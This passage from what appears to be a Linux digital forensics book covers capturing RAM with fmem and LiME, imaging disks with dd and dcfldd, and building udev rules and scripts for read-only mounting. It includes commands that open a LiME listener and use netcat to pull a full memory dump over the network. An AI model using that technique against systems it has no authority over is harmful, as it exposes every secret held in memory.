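# Hypothetical helper, not one of the book's scripts.
find_duplicate_hashes() {
  awk '{ count[$1]++; line[NR] = $0; hash[NR] = $1 }
       END { for (i = 1; i <= NR; i++) if (count[hash[i]] > 1) print line[i] }'
}
```

It could be fed from saved results or directly, for instance find /bin -xdev -type f -exec sha1sum -b {} \; | find_duplicate_hashes. Keep in mind that hard links and legitimately identical files also share a hash, so each hit still needs to be reviewed.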
DUMPING RAM
What is the perfect way to capture a running system? Get a copy of what is in RAM. This allows you to exactly recreate the state of a machine. Okay, not exactly, but close enough for our investigative purposes. Some recently released tools such as Volatility make acquiring RAM images particularly useful. Getting these images today isn’t necessarily easy, however.
Many years ago when computers had a gigabyte or less of RAM it was very easy to acquire a memory image in Linux. Part of the reason for this is that the Linux “everything is a file” philosophy also applied to RAM. The device /dev/mem represented all of the physical RAM. This device still exists today, but it is only capable of accessing the first 896 MB of physical RAM.
Virtual memory (physical RAM plus memory swapped to disk) was accessible via the /dev/kmem device. It didn’t take very long for the worldwide Linux community to figure out that having a userland (non-kernel, non-privileged mode) device that could access all memory was a huge security hole. Today /dev/kmem has been removed. Alternative means of capturing memory images are now required.
RAM acquisition methods
There are hardware devices for capturing memory. Memory dumping agents also exist. These agents are part of enterprise security solutions. These two methods for acquiring memory images are somewhat expensive and suffer from the fact that they must be in place before a breach. Neither of these is widely used.
Other than the two choices above, if you want to capture memory you will need to create some sort of device which can access all of the virtual memory. Incidentally, this assumes your subject system is not running inside a virtual machine. If it is, consult your virtualization software documentation for instructions. Techniques presented here will work on both physical and virtual systems.
A forensics memory device, fmem, is available for download from http://hysteria.sk/~niekt0/foriana/fmem_current.tgz. Because the fmem device (along with the LiME device to be discussed next) is highly dependent on various kernel structures, it must be built from source using header files from the subject machine. Remember my earlier warnings concerning building anything on the subject system.
Once built and installed, the newly created device /dev/fmem works just like /dev/mem, but without the limitation of only accessing the first 896 MB of RAM. The /dev/fmem device can be used to dump the physical RAM and /proc/iomem used to determine where to find the interesting portions. Using fmem you will end up with a raw memory image. A screenshot from the terminal window I used to build and install fmem on my forensics workstation is shown in Figure 3.9. Notice that fmem is simple enough that the entire build and install process fits on a single screen, including the printout of the memory areas after installation.
FIGURE 3.9
Building and installing fmem.
Issuing the command cat /proc/iomem will print a long list of information, most of which is uninteresting to the forensic investigator. If we use grep (whose name comes from the ed command g/re/p: globally search for a regular expression and print) to extract only the “System RAM” entries from the results using the command cat /proc/iomem | grep "System RAM", we will see which relevant blocks of memory should be captured. The tail of the unfiltered output from cat /proc/iomem and the results of piping this to grep "System RAM" are shown in Figure 3.10.
FIGURE 3.10
Results from catting the /proc/iomem pseudo file. Unfiltered results are shown at the top and the blocks of system RAM are shown at the bottom.
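The hexadecimal ranges in this listing are easier to work with as a starting offset and a length. The following is a minimal sketch of that conversion, assuming input lines of the form "<start>-<end> : System RAM". The function name ram_ranges is made up for this example.

```shell
#!/bin/bash
# ram_ranges: read /proc/iomem-style text on stdin and, for every
# "System RAM" entry, print "<start offset> <length>" in decimal bytes.
# Hypothetical helper for illustration only.
ram_ranges() {
  sed -n 's/^ *\([0-9a-fA-F]*\)-\([0-9a-fA-F]*\) : System RAM$/\1 \2/p' |
  while read -r start end; do
    first=$(printf '%d' "0x$start")
    last=$(printf '%d' "0x$end")
    # The end address is inclusive, hence the + 1.
    echo "$first $((last - first + 1))"
  done
}
```

On a live system this would be run as sudo cat /proc/iomem | ram_ranges, since recent kernels may hide the real addresses from unprivileged users. Dividing both numbers by the block size gives candidate skip and count values for dd, provided the ranges are aligned to that block size.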
The dd utility can be used to dump the relevant RAM sections to a file. This raw capture is difficult to use for anything beyond simple searches. The dd program and related utilities will be fully described in the next chapter (Chapter 4: Creating Images). Thankfully, there is a much easier and more useful way to collect memory images that we will discuss next.
Building LiME
The Linux Memory Extractor (LiME) is the tool of choice for extracting memory on Linux systems for a couple of reasons. First, it is very easy to use. Second, and more importantly, it stores the capture in a format that is easily read by the Volatility memory analysis framework.
As with fmem, LiME must be built from source. LiME should be built for the exact kernel version of the subject system, but never on the subject system. If your forensics workstation just happens to be the identical version of Ubuntu used by the subject, the command sudo apt-get install lime-forensics-dkms will download and build LiME for you.
For every other situation you must download LiME from https://github.com/504ensicsLabs/LiME using the command git clone https://github.com/504ensicsLabs/LiME and compile it with the correct kernel headers. If your workstation and the subject have the exact same kernel, LiME is built by simply changing to the directory where LiME resides and running make with no parameters. The complete set of commands to download and build LiME for the current kernel is shown in Figure 3.11. Notice that everything fits on a single screen even with my fat-fingering a few commands (running make before changing to the src directory, etc.). Also notice the last line moves (renames) the lime.ko file to lime-<kernel version>.ko.
FIGURE 3.11
Downloading and building LiME for the current kernel. Note that the module file is automatically renamed to lime-<kernel version>.ko when using this method.
If the kernel versions differ, the correct command to build LiME for the subject is make -C /lib/modules/<kernel version>/build M=$PWD. Note that when you build a LiME module this way the output file is not renamed with a suffix for the exact kernel version. I strongly recommend you do this yourself, as it doesn’t take long for you to end up with a collection of LiME kernel modules on your response drive. The commands to build and rename a LiME module that is not built for the current kernel are shown in Figure 3.12.
FIGURE 3.12
Building LiME for other than the current kernel. It is recommended that the lime.ko file be renamed to something more descriptive after it is created.
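The build and rename steps can be wrapped in a pair of small functions so the naming stays consistent across kernels. This is only a sketch: the function names lime_module_name and build_lime_for are invented here, and build_lime_for assumes it is run from LiME's src directory on a workstation that has the headers for the target kernel installed under /lib/modules.

```shell
#!/bin/bash
# lime_module_name: print the descriptive file name for kernel version $1.
lime_module_name() {
  printf 'lime-%s.ko\n' "$1"
}

# build_lime_for: build LiME against the headers for kernel version $1 and
# rename the resulting lime.ko. Both names are hypothetical helpers.
build_lime_for() {
  kver="$1"
  make -C "/lib/modules/$kver/build" M="$PWD" &&
    mv lime.ko "$(lime_module_name "$kver")"
}
```

Calling build_lime_for with the version string reported by uname -r on the subject should leave a file named lime-<kernel version>.ko in the current directory.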
Using LiME to dump RAM
Assuming that you have built LiME for the current kernel version in use by your subject system, you are now ready to use it. Before using LiME you must make two choices. The first choice is the format for output and the second is a destination for the dump file, which LiME calls a path.
There are three format choices: raw, padded, and LiME. Raw format is every memory segment concatenated together. When using the raw format, areas of memory containing blocks of zeros are skipped. Padded is similar to raw, but the zeros are retained so you can know the location of memory chunks, not just their contents.
Not surprisingly, the LiME format is the recommended format. This format captures memory and stores it in structures complete with metadata. This is the format recommended by the authors of the Volatility memory analysis framework. I also recommend this format as it contains the most information for your later analysis.
LiME supports two different paths: a file or a network port. If you have connected a large capacity USB drive to the subject computer it is acceptable to store your RAM dump directly to a file on this drive. Under no circumstances should this file be saved to the subject’s hard drive! The network port path is my preferred method for extracting memory images. When using this technique a listener is set up on the subject system, and netcat is used on the forensics workstation to receive the memory dump.
The general format for running LiME is sudo insmod lime.ko "path=<path> format=<format>". This command installs (or inserts) a kernel module. For obvious reasons this command requires root privileges. Notice that I have put quotes around the parameters for LiME. This is what you need to do with most versions of Linux. If this doesn’t work for you, try removing the quotes.
To dump the RAM, copy the correct LiME module to your response drive or other media (never the subject’s hard disk!). On the subject machine execute sudo insmod lime-<kernel version>.ko "path=tcp:<port number> format=lime" to set up a listener that will dump RAM to anyone that connects. Note that LiME supports other protocols such as UDP, but I recommend you stick with TCP. It isn’t a bad idea to run uname -a before installing LiME to double check that you are using the correct kernel version. The commands for installing LiME on the subject system are shown in Figure 3.13.
FIGURE 3.13
Installing LiME on the subject system. Note that uname -a has been run before installing LiME to remind the investigator which version of LiME should be used.
On the forensics workstation, running nc {subject IP} {port used by LiME} > {filename}, e.g. nc 192.168.56.101 8888 > ram.lime, will connect to the LiME listener, which then sends the RAM dump over the network. Once the dump has been sent LiME uninstalls the module from the subject system. The beginning of the received RAM dump is shown in Figure 3.14. Note that the file header is “EMiL” or LiME spelled backwards.
FIGURE 3.14
The RAM dump file in LiME format. Note that the header is “EMiL” or LiME spelled backwards.
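A received dump can be sanity checked by looking for this header before any analysis starts. The sketch below assumes only what is stated above, namely that a LiME format file begins with the four bytes “EMiL”. The function name is_lime_dump is hypothetical.

```shell
#!/bin/bash
# is_lime_dump: succeed if the file named by $1 begins with the bytes "EMiL".
# Hypothetical helper; it checks the first four bytes and nothing else.
is_lime_dump() {
  # tr drops NUL bytes so the shell does not complain about binary data.
  [ "$(head -c 4 "$1" 2>/dev/null | tr -d '\0')" = "EMiL" ]
}
```

A typical use would be is_lime_dump ram.lime && echo "header looks right". A matching header does not prove the transfer completed, so it complements rather than replaces hashing the file.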
SUMMARY
In this chapter we have discussed multiple techniques that can be used to gather information from a system without taking it offline. This included collecting an image of system memory for later offline analysis. Analyzing this image will be discussed later in this book (Chapter 8: Memory Analysis). In the next chapter we will turn our attention to traditional dead analysis, which requires us to shut down the subject system.
CHAPTER 4
Creating Images
INFORMATION IN THIS CHAPTER:
Shutting down the system
Image formats
Using dd
Using dcfldd
Hardware write blocking
Software write blocking
Udev rules
Live Linux distributions
Creating an image from a virtual machine
Creating an image from a physical drive
SHUTTING DOWN THE SYSTEM
We are finally ready to start the traditional dead analysis process. We have now progressed to the next block in our high level process as shown in Figure 4.1. If some time has passed since you performed your initial scans and live analysis captures described in the preceding chapters, you may wish to consider rerunning some or all of the scripts.
FIGURE 4.1
High level forensic incident response process.
As you prepare to shut down the system for imaging you are faced with a decision to perform a normal shutdown or to pull the plug. As with many things in forensics, there is not one right answer to this question for every situation. The investigator must weigh the pluses and minuses for each option.
Normal shutdown
A normal shutdown should, in theory, leave you with a clean filesystem. This, of course, assumes that this is possible with a system infected with malware. I have found that some rootkits prevent a normal shutdown. The biggest reason not to use a normal shutdown is that some malware might clean up after itself, destroy evidence, or even worse destroy other information on the system. With the modern journaling filesystems likely to be found on the subject system, a clean filesystem is not as crucial as it was many years ago.
Pulling the plug
If we simply cut power to the subject system the filesystem(s) may not be clean. As previously mentioned, this is not necessarily as serious as it was before journaling filesystems became commonplace. One thing you can do to minimize the chances of dealing with a filesystem that is extremely dirty (lots of file operations waiting in the cache) is to run the sync command before pulling the plug. There is always a chance that an attacker has altered the sync program, but in the rare instances where they have done so your live analysis would likely have revealed this.
The best thing this method has going for it is that malware doesn’t have any chance to react. Given the information collected by running your scripts during the live analysis and the memory image you have dumped, you are not likely to lose much if any information by pulling the plug. If you suspect a malware infection this is your best option in most cases.
IMAGE FORMATS
As with the memory images, there are choices of formats for storing filesystem images. At a basic level you must decide between a raw format and a proprietary format. Within these choices there are still subchoices to be made.
Raw format
The raw format is nothing more than a set of bytes stored in the same logical order as they are found on disk. Nearly every medium you are likely to encounter utilizes 512 byte sectors. Whereas older devices formatted with Windows filesystems (primarily FAT12 and FAT16) may use cylinders, heads, and sectors to address these sectors, the Linux forensics investigator is much more fortunate in that media he or she encounters will almost certainly use Logical Block Addressing (LBA).
On media where LBA is used, sectors are numbered logically from 0 to ({media size in bytes} / 512 - 1). The sectors are labeled LBA0, LBA1, etc. It is important to understand that this logical addressing is done transparently by the media device and is therefore deterministic (doesn’t depend on which operating system reads the filesystem, etc.). A raw image is nothing more than a large file with LBA0 in the first 512 bytes, followed by LBA1 in the next 512 bytes, and so on.
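Because a raw image is laid out this way, any sector can be located with simple arithmetic. The two functions below are a small sketch of that idea. Their names, last_lba and read_sector, are assumptions made for this example, and both assume 512 byte sectors.

```shell
#!/bin/bash
# last_lba: highest sector number for media of $1 bytes (512 byte sectors).
last_lba() {
  echo $(( $1 / 512 - 1 ))
}

# read_sector: write sector number $2 of raw image $1 to standard output.
# dd skips $2 blocks of 512 bytes and then copies exactly one block.
read_sector() {
  dd if="$1" bs=512 skip="$2" count=1 2>/dev/null
}
```

Something like read_sector sda.img 0 | od -A d -t x1 | head would then display the start of LBA0 from an image named sda.img.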
Because the raw format is essentially identical to what is stored on the media, there are numerous standard tools that can be used to manipulate raw images. For this and other reasons the raw format is very popular and supported by every forensics tool. Because raw images are the same size as the media they represent, they tend to be quite large.
Some investigators like to compress raw images. Indeed, some forensics tools can operate on compressed raw images. One thing to keep in mind should you choose to work with compressed images is that it limits your tool selection. It will also likely result in a performance penalty for many common forensics tasks such as searching.
Proprietary format with embedded metadata
EnCase is a widely used proprietary forensics tool. It is especially popular among examiners that focus on Windows systems. The EnCase file format consists of a header, the raw sectors with checksums every 32 kilobytes (64 standard sectors), and a footer. The header contains metadata such as the examiner, acquisition date, etc. and ends with a checksum. The footer has an MD5 checksum for the media image.
The EnCase file format supports compression. Compression is done at the block level, which makes searching a little faster than it would be otherwise. The reason for this is that most searches are performed for certain types of files, and file headers at the beginning of blocks (sectors) are used to determine file type.
Proprietary format with metadata in a separate file
Halfway between the raw format and some sort of proprietary format is the use of multiple files to store an image. Typically one file is a raw image and the other stores metadata in a proprietary way. A number of imaging tools make this choice.
Raw format with hashes stored in a separate file
In my opinion, the best option is to acquire images in the raw format with hashes stored separately. This allows the image to be used with every forensics package available and adds standard Linux system tools to your toolbox. The hashes allow you to prove that you have maintained the integrity of the image during the investigation.
In a perfect world you would create an image of a disk and calculate a hash for the entire image and that would be the end of it. We don’t live in a perfect world, however. As a result, I recommend that you hash chunks of the image in addition to calculating an overall hash.
There are a couple of reasons for this recommendation. First, it is a good idea to periodically recalculate the hashes as you work to verify you have not changed an image. If the image is large, computing the overall hash might be time consuming when compared to hashing a small chunk. Second, you may encounter media that is damaged. Certain areas may not read the same every time. It is much better to discard data from these damaged areas than to throw out an entire disk image if the hash doesn’t match. Fortunately some of the tools to be discussed in this chapter do this hashing for you.
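To make the idea of chunk hashes concrete, here is a minimal sketch built only from dd and sha256sum. The function name hash_chunks and its output layout are invented for this example and are not the format written by any particular imaging tool.

```shell
#!/bin/bash
# hash_chunks: print "<chunk number> <SHA256>" for each chunk of $2 bytes in
# the file $1, followed by a "total" line with the hash of the whole file.
# Hypothetical helper; dd reads one whole chunk into memory at a time, so
# keep the chunk size modest when trying this out.
hash_chunks() {
  image="$1"
  chunk="$2"
  size=$(wc -c < "$image")
  count=$(( (size + chunk - 1) / chunk ))   # round up for a partial last chunk
  i=0
  while [ "$i" -lt "$count" ]; do
    hash=$(dd if="$image" bs="$chunk" skip="$i" count=1 2>/dev/null |
           sha256sum | cut -d ' ' -f 1)
    echo "$i $hash"
    i=$((i + 1))
  done
  echo "total $(sha256sum < "$image" | cut -d ' ' -f 1)"
}
```

Saving the output of hash_chunks sda.img 1048576 when the image is created, and comparing it with a later run using diff, shows which chunks, if any, have changed.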
USING DD
All Linux systems ship with a bit-moving program known as dd. This utility predates Linux by several years. Its original use was for converting to and from ASCII (American Standard Code for Information Interchange) and EBCDIC (Extended Binary Coded Decimal Interchange Code). For those unfamiliar with EBCDIC, it was an encoding primarily used by IBM mainframes.
In addition to its conversion capabilities, dd is used for pushing data from one place to another. Data is copied in blocks, with a default block size of 512 bytes. The most basic use of dd is dd if=<input file> of=<output file> bs=<block size>. In Linux, where everything is a file, if the input file represents a device, the output file will be a raw image.
For example, dd if=/dev/sda of=sda.img bs=512 will create a raw image of the first drive on a system. I should point out that you can also image partitions separately by using a device file that corresponds to a single partition such as /dev/sda1, /dev/sdb2, etc. I recommend that you image the entire disk as a unit, however, unless there is some reason (such as lack of space to store the image) that prevents this.
There are a few reasons why I recommend imaging the entire drive if at all possible. First, it becomes much simpler to mount multiple partitions all at once using scripts presented later in this book. Second, any string searches can be performed against everything you have collected, including swap space. Finally, there could be data hidden in unallocated space (not part of any partition).
Does block size matter? In theory it doesn’t matter, as dd will faithfully copy any partial blocks so that the input and output files are the same size (assuming no conversions are performed). The default block size is 512 bytes. Optimum performance is achieved when the block size is an even multiple of the bytes read at a time from the input file.
As most devices have 512 byte blocks, any multiple of 512 will improve performance at the expense of using more memory. In the typical scenario (described later in this chapter) where an image is being created from media removed from the subject system, memory footprint is not a concern and a block size of 4 kilobytes or more is safely used. Block sizes may be directly entered in bytes or as multiples of 512 bytes, kilobytes (1024 bytes), or megabytes (1024 * 1024 bytes) using the symbols b, k, and M, respectively. For example, a 4 kilobyte block size can be written as 4096, 8b, or 4k.
There is one last thing I should mention before moving on to another tool. What happens when there is an error? The default behavior is for dd to fail. This can be changed by adding the option conv=noerror,sync to the dd command. When a read error occurs, any bad bytes will be replaced with zeros in order to synchronize the position of everything between the input and output files.
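The block size notations and the error handling option can be tried safely on an ordinary file before pointing dd at real media. The wrapper below is a sketch for that purpose, and the name copy_raw is an assumption made for this example.

```shell
#!/bin/bash
# copy_raw: copy $1 to $2 using block size $3, continuing past read errors
# and zero-padding any short block (conv=noerror,sync).
# Hypothetical wrapper around dd for experimenting with block sizes.
copy_raw() {
  dd if="$1" of="$2" bs="$3" conv=noerror,sync 2>/dev/null
}
```

Running copy_raw with block sizes of 4096, 8b, and 4k against the same input should give three identical outputs, which cmp can confirm. One side effect to be aware of is that sync pads a short final block as well, so an input whose size is not a multiple of the block size yields an output with extra zeros at the end.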
USING DCFLDD
The United States Department of Defense Computer Forensics Lab developed an enhanced version of dd known as dcfldd. This tool adds several forensics features to dd. One of the most important features is the ability to calculate hashes on the fly. The calculated hashes may be sent to a file, displayed in a terminal (default), or both.
In addition to calculating an overall hash, dcfldd can compute hashes for chunks of data (which it calls windows). As of this writing, dcfldd supports the following hash algorithms: MD5, SHA1, SHA256, SHA384, and SHA512. Multiple hash algorithms may be used simultaneously with hashes written to separate files.
The general format for using dcfldd to create an image with hashes in a separate file is dcfldd if=<subject device> of=<image file> bs=<block size> hash=<algorithm> hashwindow=<chunk size> hashlog=<hash file> conv=noerror,sync. For example, to create an image of the second hard drive on a system with SHA256 hashes calculated every 1 GB the correct command would be dcfldd if=/dev/sdb of=sdb.img bs=8k hash=sha256 hashwindow=1G hashlog=sdb.hashes conv=noerror,sync. If you wanted to calculate both SHA256 and MD5 hashes for some reason the command would be dcfldd if=/dev/sdb of=sdb.img bs=8k hash=sha256,md5 hashwindow=1G sha256log=sdb.sha256hashes md5log=sdb.md5hashes conv=noerror,sync.
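With this many options it is easy to mistype one. One way to reduce that risk is to generate the command line from the device and a base name and review it before running it. The sketch below does only that. The function name dcfldd_command is hypothetical, and the options are exactly those from the SHA256 example above.

```shell
#!/bin/bash
# dcfldd_command: print (do not run) a dcfldd command line that images
# device $1 into $2.img with SHA256 hashes for every 1 GB window logged to
# $2.hashes. Hypothetical helper; nothing is read or written by it.
dcfldd_command() {
  printf 'dcfldd if=%s of=%s.img bs=8k hash=sha256 hashwindow=1G hashlog=%s.hashes conv=noerror,sync\n' "$1" "$2" "$2"
}
```

For instance, dcfldd_command /dev/sdb sdb prints the example command shown earlier, which can then be pasted into a root shell once the device name has been double checked.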
HARDWARE WRITE BLOCKING
You should have some means of assuring that you are not altering the subject’s hard drives and/or other media when creating images. The traditional way to do this is to use a hardware write blocker. In many cases hardware write blockers are protocol (SATA, IDE, SCSI, etc.) specific.
Hardware write blockers tend to be a little pricey. A cheaper model might cost upwards of US$350. Because they are expensive, you might not be able to afford a set of blockers for all possible protocols. If you can only afford one blocker I recommend you buy a SATA unit, as that is by far what the majority of systems will be using. A relatively inexpensive blocker is shown in Figure 4.2. If you find yourself doing a lot of Linux response in data centers a SCSI unit might be a good choice for a second blocker.
FIGURE 4.2
A Tableau SATA write blocker.
There are a few cheaper open-source options available, but they tend to have limitations. One such option is a microcontroller-based USB write blocker which I developed and described in a course on USB forensics at PentesterAcademy.com (http://www.pentesteracademy.com/course?id=16). I do not recommend the use of this device for large media, however, as it is limited to USB 2.0 full speed (12 Mbps). I may port this code to a new microcontroller that is capable of higher speeds (at least 480 Mbps) at some point, but for the moment I recommend the udev rules method described later in this chapter.
SOFTWARE WRITE BLOCKING
Just as hardware routers are really just pretty boxes running software routers (usually on Linux), hardware write blockers are almost always small computer devices running write blocking software. There are several commercial options for Windows systems. Naturally, most of the Linux choices are free and open source.
There is a kernel patch available to mount block devices automatically. You can also set something up in your favorite scripting language. Next I will describe a simple way to block anything connected via USB using udev rules.
Udev rules
Udev rules are the new way to control how devices are handled on Linux systems. Using the udev rules presented below, a “magic USB hub” can be created that automatically mounts any block device connected downstream from the hub as read-only.
Linux systems ship with a set of standard udev rules. Administrators may customize their systems by adding their own rules to the /etc/udev/rules.d directory. Like many system scripts (e.g. startup scripts), the order in which these rules are executed is determined by the filename. Standard practice is to start the filename with a number which determines when it is loaded.
When the rules in the rules file below are run, not all of the information required to mount a filesystem is available yet. For this reason, the rules run scripts which in turn generate other scripts, in two stages. The file should be named /etc/udev/rules.d/10-protectedmount.rules. Note that the vendor and product identifiers will be set with an install script to match your hub. This install script is presented later in this chapter.
ACTION=="add", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="1a40", ATTRS{idProduct}=="0101", ENV{PHIL_MOUNT}="1", ENV{PHIL_DEV}="%k", RUN+="/etc/udev/scripts/protmount.sh %k %n"
ACTION=="remove", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="1a40", ATTRS{idProduct}=="0101", ENV{PHIL_UNMOUNT}="1", RUN+="/etc/udev/scripts/protmount3.sh %k %n"
ENV{PHIL_MOUNT}=="1", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_AUTOMOUNT_HINT}="never", RUN+="/etc/udev/scripts/protmount2-%n.sh"
ENV{PHIL_MOUNT}!="1", ENV{UDISKS_PRESENTATION_HIDE}="0", ENV{UDISKS_AUTOMOUNT_HINT}="always"
ENV{PHIL_UNMOUNT}=="1", RUN+="/etc/udev/scripts/protmount4-%n.sh"
The general format for these rules is a series of statements separated by commas. The first statements, those with double equals (“==”), are matching statements. If all of these are matched, the remaining statements are run. These statements primarily set environment variables and add scripts to a list of those to be run. Any such scripts should run quickly in order to avoid bogging down the system.
The first rule can be broken into matching statements and statements to be executed. The matching statements are ACTION=="add", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="1a40", ATTRS{idProduct}=="0101". This matches when a new device is added; it is a block device; it is named /dev/sdXn (where X is a letter and n is a partition number); and it or one of its parents has a USB vendor and product ID matching those specified. If you only want to match the current device’s attribute and not the parent’s, use ATTR{attributeName} instead of ATTRS{attributeName}. By using ATTRS we are assured the rule will be matched by every device attached downstream from the hub.
The part of the first rule containing commands to run is ENV{PHIL_MOUNT}="1", ENV{PHIL_DEV}="%k", RUN+="/etc/udev/scripts/protmount.sh %k %n". These statements set an environment variable PHIL_MOUNT equal to 1, set another environment variable PHIL_DEV to the kernel name for the device (sda3, sdb1, etc.), and append /etc/udev/scripts/protmount.sh to the list of scripts to be run, with the kernel name for the device and partition number passed in as parameters.
The second rule is very similar to the first, but it matches when the device is removed. It sets an environment variable PHIL_UNMOUNT to 1 and adds /etc/udev/scripts/protmount3.sh to the list of scripts to be run (the kernel device name and partition number are again passed in as parameters). The protmount3.sh and protmount4.sh scripts are used to clean up after the device is removed.
The next rule, ENV{PHIL_MOUNT}=="1", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_AUTOMOUNT_HINT}="never", RUN+="/etc/udev/scripts/protmount2-%n.sh", is run later, just before the operating system attempts to mount the filesystem. If the PHIL_MOUNT variable has been set, we tell the operating system to hide the normal dialog that is displayed, never automount the filesystem (because it wouldn’t be mounted read-only), and add the protmount2 script generated for this partition to the list of things to be executed. If PHIL_MOUNT has not been set to 1, we set up the operating system to handle the device the standard way. The last rule causes the corresponding protmount4 script to run if the PHIL_UNMOUNT variable has been set.
We will now turn our attention to the scripts. Two of the scripts, protmount.sh and protmount3.sh, are used to create the other two, protmount2.sh and protmount4.sh, respectively. As previously mentioned, the reason for this is that not all of the information needed to properly mount and unmount the filesystem is available at the same time. The protmount.sh script follows.
#!/bin/bash
echo "#!/bin/bash" > "/etc/udev/scripts/protmount2-$2.sh"
echo "mkdir /media/$1" >> "/etc/udev/scripts/protmount2-$2.sh"
echo "chmod 777 /media/$1" >> "/etc/udev/scripts/protmount2-$2.sh"
echo "/bin/mount /dev/$1 -o ro,noatime /media/$1" >> "/etc/udev/scripts/protmount2-$2.sh"
chmod +x "/etc/udev/scripts/protmount2-$2.sh"
This script echoes a series of commands to the new script. The first line includes the familiar she-bang. The second line creates a directory, /media/{kernel device name} (e.g. /media/sdb2). The third line opens up the permissions on the directory. The fourth line mounts the filesystem as read-only with no access time updating in the newly created directory. The final line in the script makes the protmount2.sh script executable.
The protmount3.sh script is similar except that it creates a cleanup script. The cleanup script is protmount4.sh. The protmount3.sh script follows.
#!/bin/bash
echo "#!/bin/bash" > "/etc/udev/scripts/protmount4-$2.sh"
echo "/bin/umount /dev/$1" >> "/etc/udev/scripts/protmount4-$2.sh"
echo "rmdir /media/$1" >> "/etc/udev/scripts/protmount4-$2.sh"
chmod +x "/etc/udev/scripts/protmount4-$2.sh"
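After connecting media through the hub it is worth confirming that the filesystem really was mounted read-only before touching it. The following sketch checks the mount options recorded in /proc/mounts. The function name is_readonly_mount is hypothetical, and the optional second argument exists only so the check can be tried against a saved copy of the mount table.

```shell
#!/bin/bash
# is_readonly_mount: succeed if mount point $1 is listed with the "ro"
# option. $2 is the mount table to read (defaults to /proc/mounts).
# Hypothetical helper, not part of the protmount scripts.
is_readonly_mount() {
  awk -v mp="$1" '
    $2 == mp {
      # Field 4 holds the comma-separated mount options.
      n = split($4, opts, ",")
      for (i = 1; i <= n; i++) if (opts[i] == "ro") found = 1
    }
    END { exit found ? 0 : 1 }
  ' "${2:-/proc/mounts}"
}
```

For a partition mounted by the scripts above, is_readonly_mount /media/sdb1 && echo "read-only" would be a reasonable check. Options are compared one at a time, so a value such as errors=remount-ro is not mistaken for ro.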
An installation script has been created for installing this system. This script takes a vendor and product ID as required parameters. It also takes an optional second product ID. You might be curious as to why this is in the script. If you are using a USB 3.0 hub (recommended) it actually presents itself as two devices: one is a USB 2.0 hub and the other is a USB 3.0 hub. These two devices will have a common vendor ID, but unique product IDs.
#!/bin/bash
#
# Install script for 4deck addon to "The Deck"
# This script will install udev rules which will turn a USB hub
# into a magic hub. Every block device connected to the magic hub
# will be automatically mounted under the /media directory as read only.
# While this was designed to work with "The Deck" it will most likely
# work with most modern Linux distros. This software is provided as is
# without warranty of any kind, express or implied. Use at your own
# risk. The author is not responsible for anything that happens as
# a result of using this software.
#
# Initial version created August 2012 by Dr. Phil Polstra, Sr.
# Version 1.1 created March 2015
# new version adds support for a second PID which is required
# when using USB 3.0 hubs as they actually present as two hubs
unset VID
unset PID
unset PID2
function usage {
  echo "usage: sudo $(basename $0) --vid 05e3 --pid 0608 [--pid2 0610]"
  cat <<EOF
Bugs email: "DrPhil at polstra.org"
Required Parameters:
--vid <Vendor ID of USB hub>
--pid <Product ID of USB hub>
Optional Parameters:
--pid2 <Second Product ID of USB 3.0 hub>
EOF
  exit
}
function createRule {
  cat > /etc/udev/rules.d/10-protectedmount.rules <<-__EOF__
ACTION=="add", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="${VID}", ATTRS{idProduct}=="${PID}", ENV{PHIL_MOUNT}="1", ENV{PHIL_DEV}="%k", RUN+="/etc/udev/scripts/protmount.sh %k %n"
ACTION=="remove", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="${VID}", ATTRS{idProduct}=="${PID}", ENV{PHIL_UNMOUNT}="1", RUN+="/etc/udev/scripts/protmount3.sh %k %n"
ENV{PHIL_MOUNT}=="1", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_AUTOMOUNT_HINT}="never", RUN+="/etc/udev/scripts/protmount2-%n.sh"
ENV{PHIL_MOUNT}!="1", ENV{UDISKS_PRESENTATION_HIDE}="0", ENV{UDISKS_AUTOMOUNT_HINT}="always"
ENV{PHIL_UNMOUNT}=="1", RUN+="/etc/udev/scripts/protmount4-%n.sh"
__EOF__
  if [ ! "$PID2" = "" ] ; then
    cat >> /etc/udev/rules.d/10-protectedmount.rules <<-__EOF__
ACTION=="add", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="${VID}", ATTRS{idProduct}=="${PID2}", ENV{PHIL_MOUNT}="1", ENV{PHIL_DEV}="%k", RUN+="/etc/udev/scripts/protmount.sh %k %n"
ACTION=="remove", SUBSYSTEM=="block", KERNEL=="sd?[1-9]", ATTRS{idVendor}=="${VID}", ATTRS{idProduct}=="${PID2}", ENV{PHIL_UNMOUNT}="1", RUN+="/etc/udev/scripts/protmount3.sh %k %n"
ENV{PHIL_MOUNT}=="1", ENV{UDISKS_PRESENTATION_HIDE}="1", ENV{UDISKS_AUTOMOUNT_HINT}="never", RUN+="/etc/udev/scripts/protmount2-%n.sh"
ENV{PHIL_MOUNT}!="1", ENV{UDISKS_PRESENTATION_HIDE}="0", ENV{UDISKS_AUTOMOUNT_HINT}="always"
ENV{PHIL_UNMOUNT}=="1", RUN+="/etc/udev/scripts/protmount4-%n.sh"
__EOF__
  fi
}
function copyScripts {
  if [ ! -d "/etc/udev/scripts" ] ; then
    mkdir /etc/udev/scripts
  fi
  cp ./protmount*.sh /etc/udev/scripts/.
}
# parse command line options
while [ ! -z "$1" ]; do
  case $1 in
    -h|--help)
      usage
      ;;
    --vid)
      VID="$2"
      ;;
    --pid)
      PID="$2"
      ;;
    --pid2)
      PID2="$2"
      ;;
  esac
  shift # consume command line arguments 1 at a time
done
# now actually do something
createRule
copyScripts
The script is straightforward. It begins with the usual she-bang, then the VID, PID, and PID2 variables are unset. We see a typical usage function, then a few functions are defined for creating and copying files. Finally, the command line options are parsed and these functions are run at the end of the script.
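The vendor and product IDs that the install script needs can be read from the output of lsusb, which lists each device as "Bus <n> Device <n>: ID <vendor>:<product> <description>". The sketch below turns those lines into install script options. The function name hub_install_args is an assumption made for this example.

```shell
#!/bin/bash
# hub_install_args: read lsusb output on stdin and, for every line whose
# description mentions a hub, print the matching install script options.
# Hypothetical helper for illustration only.
hub_install_args() {
  awk 'tolower($0) ~ /hub/ && $5 == "ID" {
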